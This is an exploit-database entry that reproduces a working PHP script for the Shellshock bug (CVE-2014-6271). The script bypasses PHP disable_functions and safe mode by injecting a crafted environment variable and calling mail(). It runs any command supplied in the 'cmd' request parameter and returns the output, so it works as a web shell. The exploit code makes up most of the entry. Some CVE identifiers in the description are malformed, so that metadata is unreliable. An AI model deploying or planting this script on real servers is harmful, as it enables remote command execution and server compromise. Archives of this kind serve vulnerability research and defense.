ID

VAR-E-201410-0030

CVE

EDB ID

35146

TITLE

PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection - PHP webapps Exploit

DESCRIPTION

PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection. CVE-2014-7910CVE-2014-7227CVE-2014-7196CVE-2014-7169CVE-2014-62771CVE-112004CVE-2014-6271CVE-2014-3671CVE-2014-3659 . webapps exploit for PHP platform

AFFECTED PRODUCTS

EXPLOIT

# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271
<pre>
<?php echo "Disabled functions: ".ini_get('disable_functions')."\n"; ?>
<?php
function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
$tmp = tempnam(".","data");
putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
// In Safe Mode, the user may only alter environment variables whose names
// begin with the prefixes supplied by this directive.
// By default, users will only be able to set environment variables that
// begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
// PHP will let the user modify ANY environment variable!
mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail
}
else return "Not vuln (not bash)";
$output = @file_get_contents($tmp);
@unlink($tmp);
if($output != "") return $output;
else return "No output, or not vuln.";
}
echo shellshock($_REQUEST["cmd"]);
?>

EXPLOIT LANGUAGE

txt

PRICE

free

TYPE

'Shellshock' Safe Mode / disable_functions Bypass / Command Injection

CREDITS

Ryan King (Starfall)

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2023-05-30T10:41:06.059000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE